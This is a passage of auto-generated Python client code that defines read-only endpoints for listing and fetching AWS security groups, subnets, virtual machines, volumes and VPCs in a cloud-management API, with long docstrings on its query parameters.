"""Read a 'cloud.AwsSecurityGroup' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cloud_aws_security_group_list(async_req=True)
>>> result = thread.get()
Keyword Args:
filter (str): Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).. [optional] if omitted the server will use the default value of ""
orderby (str): Determines what properties are used to sort the collection of resources.. [optional]
top (int): Specifies the maximum number of resources to return in the response.. [optional] if omitted the server will use the default value of 100
skip (int): Specifies the number of resources to skip in the response.. [optional] if omitted the server will use the default value of 0
select (str): Specifies a subset of properties to return.. [optional] if omitted the server will use the default value of ""
expand (str): Specify additional attributes or related resources to return in addition to the primary resources.. [optional]
apply (str): Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.. [optional]
count (bool): The $count query specifies the service should return the count of the matching resources, instead of returning the resources.. [optional]
inlinecount (str): The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.. [optional] if omitted the server will use the default value of "allpages"
at (str): Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.. [optional]
tags (str): The 'tags' parameter is used to request a summary of the Tag utilization for this resource. When the 'tags' parameter is specified, the response provides a list of tag keys, the number of times the key has been used across all documents, and the tag values that have been assigned to the tag key.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudAwsSecurityGroupResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_cloud_aws_security_group_list = _Endpoint(
settings={
'response_type': (CloudAwsSecurityGroupResponse,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/AwsSecurityGroups',
'operation_id': 'get_cloud_aws_security_group_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'filter',
'orderby',
'top',
'skip',
'select',
'expand',
'apply',
'count',
'inlinecount',
'at',
'tags',
],
'required': [],
'nullable': [
],
'enum': [
'inlinecount',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('inlinecount',): {
"ALLPAGES": "allpages",
"NONE": "none"
},
},
'openapi_types': {
'filter':
(str,),
'orderby':
(str,),
'top':
(int,),
'skip':
(int,),
'select':
(str,),
'expand':
(str,),
'apply':
(str,),
'count':
(bool,),
'inlinecount':
(str,),
'at':
(str,),
'tags':
(str,),
},
'attribute_map': {
'filter': '$filter',
'orderby': '$orderby',
'top': '$top',
'skip': '$skip',
'select': '$select',
'expand': '$expand',
'apply': '$apply',
'count': '$count',
'inlinecount': '$inlinecount',
'at': 'at',
'tags': 'tags',
},
'location_map': {
'filter': 'query',
'orderby': 'query',
'top': 'query',
'skip': 'query',
'select': 'query',
'expand': 'query',
'apply': 'query',
'count': 'query',
'inlinecount': 'query',
'at': 'query',
'tags': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_cloud_aws_security_group_list
)
def __get_cloud_aws_subnet_by_moid(
self,
moid,
**kwargs
):
"""Read a 'cloud.AwsSubnet' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cloud_aws_subnet_by_moid(moid, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudAwsSubnet
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
return self.call_with_http_info(**kwargs)
self.get_cloud_aws_subnet_by_moid = _Endpoint(
settings={
'response_type': (CloudAwsSubnet,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/AwsSubnets/{Moid}',
'operation_id': 'get_cloud_aws_subnet_by_moid',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'moid',
],
'required': [
'moid',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
},
'attribute_map': {
'moid': 'Moid',
},
'location_map': {
'moid': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_cloud_aws_subnet_by_moid
)
def __get_cloud_aws_subnet_list(
self,
**kwargs
):
"""Read a 'cloud.AwsSubnet' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cloud_aws_subnet_list(async_req=True)
>>> result = thread.get()
Keyword Args:
filter (str): Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).. [optional] if omitted the server will use the default value of ""
orderby (str): Determines what properties are used to sort the collection of resources.. [optional]
top (int): Specifies the maximum number of resources to return in the response.. [optional] if omitted the server will use the default value of 100
skip (int): Specifies the number of resources to skip in the response.. [optional] if omitted the server will use the default value of 0
select (str): Specifies a subset of properties to return.. [optional] if omitted the server will use the default value of ""
expand (str): Specify additional attributes or related resources to return in addition to the primary resources.. [optional]
apply (str): Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.. [optional]
count (bool): The $count query specifies the service should return the count of the matching resources, instead of returning the resources.. [optional]
inlinecount (str): The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.. [optional] if omitted the server will use the default value of "allpages"
at (str): Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.. [optional]
tags (str): The 'tags' parameter is used to request a summary of the Tag utilization for this resource. When the 'tags' parameter is specified, the response provides a list of tag keys, the number of times the key has been used across all documents, and the tag values that have been assigned to the tag key.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudAwsSubnetResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_cloud_aws_subnet_list = _Endpoint(
settings={
'response_type': (CloudAwsSubnetResponse,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/AwsSubnets',
'operation_id': 'get_cloud_aws_subnet_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'filter',
'orderby',
'top',
'skip',
'select',
'expand',
'apply',
'count',
'inlinecount',
'at',
'tags',
],
'required': [],
'nullable': [
],
'enum': [
'inlinecount',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('inlinecount',): {
"ALLPAGES": "allpages",
"NONE": "none"
},
},
'openapi_types': {
'filter':
(str,),
'orderby':
(str,),
'top':
(int,),
'skip':
(int,),
'select':
(str,),
'expand':
(str,),
'apply':
(str,),
'count':
(bool,),
'inlinecount':
(str,),
'at':
(str,),
'tags':
(str,),
},
'attribute_map': {
'filter': '$filter',
'orderby': '$orderby',
'top': '$top',
'skip': '$skip',
'select': '$select',
'expand': '$expand',
'apply': '$apply',
'count': '$count',
'inlinecount': '$inlinecount',
'at': 'at',
'tags': 'tags',
},
'location_map': {
'filter': 'query',
'orderby': 'query',
'top': 'query',
'skip': 'query',
'select': 'query',
'expand': 'query',
'apply': 'query',
'count': 'query',
'inlinecount': 'query',
'at': 'query',
'tags': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_cloud_aws_subnet_list
)
def __get_cloud_aws_virtual_machine_by_moid(
self,
moid,
**kwargs
):
"""Read a 'cloud.AwsVirtualMachine' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cloud_aws_virtual_machine_by_moid(moid, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudAwsVirtualMachine
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
return self.call_with_http_info(**kwargs)
self.get_cloud_aws_virtual_machine_by_moid = _Endpoint(
settings={
'response_type': (CloudAwsVirtualMachine,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/AwsVirtualMachines/{Moid}',
'operation_id': 'get_cloud_aws_virtual_machine_by_moid',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'moid',
],
'required': [
'moid',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
},
'attribute_map': {
'moid': 'Moid',
},
'location_map': {
'moid': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_cloud_aws_virtual_machine_by_moid
)
def __get_cloud_aws_virtual_machine_list(
self,
**kwargs
):
"""Read a 'cloud.AwsVirtualMachine' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cloud_aws_virtual_machine_list(async_req=True)
>>> result = thread.get()
Keyword Args:
filter (str): Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).. [optional] if omitted the server will use the default value of ""
orderby (str): Determines what properties are used to sort the collection of resources.. [optional]
top (int): Specifies the maximum number of resources to return in the response.. [optional] if omitted the server will use the default value of 100
skip (int): Specifies the number of resources to skip in the response.. [optional] if omitted the server will use the default value of 0
select (str): Specifies a subset of properties to return.. [optional] if omitted the server will use the default value of ""
expand (str): Specify additional attributes or related resources to return in addition to the primary resources.. [optional]
apply (str): Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.. [optional]
count (bool): The $count query specifies the service should return the count of the matching resources, instead of returning the resources.. [optional]
inlinecount (str): The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.. [optional] if omitted the server will use the default value of "allpages"
at (str): Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.. [optional]
tags (str): The 'tags' parameter is used to request a summary of the Tag utilization for this resource. When the 'tags' parameter is specified, the response provides a list of tag keys, the number of times the key has been used across all documents, and the tag values that have been assigned to the tag key.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudAwsVirtualMachineResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_cloud_aws_virtual_machine_list = _Endpoint(
settings={
'response_type': (CloudAwsVirtualMachineResponse,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/AwsVirtualMachines',
'operation_id': 'get_cloud_aws_virtual_machine_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'filter',
'orderby',
'top',
'skip',
'select',
'expand',
'apply',
'count',
'inlinecount',
'at',
'tags',
],
'required': [],
'nullable': [
],
'enum': [
'inlinecount',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('inlinecount',): {
"ALLPAGES": "allpages",
"NONE": "none"
},
},
'openapi_types': {
'filter':
(str,),
'orderby':
(str,),
'top':
(int,),
'skip':
(int,),
'select':
(str,),
'expand':
(str,),
'apply':
(str,),
'count':
(bool,),
'inlinecount':
(str,),
'at':
(str,),
'tags':
(str,),
},
'attribute_map': {
'filter': '$filter',
'orderby': '$orderby',
'top': '$top',
'skip': '$skip',
'select': '$select',
'expand': '$expand',
'apply': '$apply',
'count': '$count',
'inlinecount': '$inlinecount',
'at': 'at',
'tags': 'tags',
},
'location_map': {
'filter': 'query',
'orderby': 'query',
'top': 'query',
'skip': 'query',
'select': 'query',
'expand': 'query',
'apply': 'query',
'count': 'query',
'inlinecount': 'query',
'at': 'query',
'tags': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_cloud_aws_virtual_machine_list
)
def __get_cloud_aws_volume_by_moid(
self,
moid,
**kwargs
):
"""Read a 'cloud.AwsVolume' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cloud_aws_volume_by_moid(moid, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudAwsVolume
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
return self.call_with_http_info(**kwargs)
self.get_cloud_aws_volume_by_moid = _Endpoint(
settings={
'response_type': (CloudAwsVolume,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/AwsVolumes/{Moid}',
'operation_id': 'get_cloud_aws_volume_by_moid',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'moid',
],
'required': [
'moid',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
},
'attribute_map': {
'moid': 'Moid',
},
'location_map': {
'moid': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_cloud_aws_volume_by_moid
)
def __get_cloud_aws_volume_list(
self,
**kwargs
):
"""Read a 'cloud.AwsVolume' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cloud_aws_volume_list(async_req=True)
>>> result = thread.get()
Keyword Args:
filter (str): Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).. [optional] if omitted the server will use the default value of ""
orderby (str): Determines what properties are used to sort the collection of resources.. [optional]
top (int): Specifies the maximum number of resources to return in the response.. [optional] if omitted the server will use the default value of 100
skip (int): Specifies the number of resources to skip in the response.. [optional] if omitted the server will use the default value of 0
select (str): Specifies a subset of properties to return.. [optional] if omitted the server will use the default value of ""
expand (str): Specify additional attributes or related resources to return in addition to the primary resources.. [optional]
apply (str): Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.. [optional]
count (bool): The $count query specifies the service should return the count of the matching resources, instead of returning the resources.. [optional]
inlinecount (str): The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.. [optional] if omitted the server will use the default value of "allpages"
at (str): Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.. [optional]
tags (str): The 'tags' parameter is used to request a summary of the Tag utilization for this resource. When the 'tags' parameter is specified, the response provides a list of tag keys, the number of times the key has been used across all documents, and the tag values that have been assigned to the tag key.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudAwsVolumeResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_cloud_aws_volume_list = _Endpoint(
settings={
'response_type': (CloudAwsVolumeResponse,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/AwsVolumes',
'operation_id': 'get_cloud_aws_volume_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'filter',
'orderby',
'top',
'skip',
'select',
'expand',
'apply',
'count',
'inlinecount',
'at',
'tags',
],
'required': [],
'nullable': [
],
'enum': [
'inlinecount',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('inlinecount',): {
"ALLPAGES": "allpages",
"NONE": "none"
},
},
'openapi_types': {
'filter':
(str,),
'orderby':
(str,),
'top':
(int,),
'skip':
(int,),
'select':
(str,),
'expand':
(str,),
'apply':
(str,),
'count':
(bool,),
'inlinecount':
(str,),
'at':
(str,),
'tags':
(str,),
},
'attribute_map': {
'filter': '$filter',
'orderby': '$orderby',
'top': '$top',
'skip': '$skip',
'select': '$select',
'expand': '$expand',
'apply': '$apply',
'count': '$count',
'inlinecount': '$inlinecount',
'at': 'at',
'tags': 'tags',
},
'location_map': {
'filter': 'query',
'orderby': 'query',
'top': 'query',
'skip': 'query',
'select': 'query',
'expand': 'query',
'apply': 'query',
'count': 'query',
'inlinecount': 'query',
'at': 'query',
'tags': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_cloud_aws_volume_list
)
def __get_cloud_aws_vpc_by_moid(
self,
moid,
**kwargs
):
"""Read a 'cloud.AwsVpc' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cloud_aws_vpc_by_moid(moid, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudAwsVpc
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
return self.call_with_http_info(**kwargs)
self.get_cloud_aws_vpc_by_moid = _Endpoint(
settings={
'response_type': (CloudAwsVpc,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
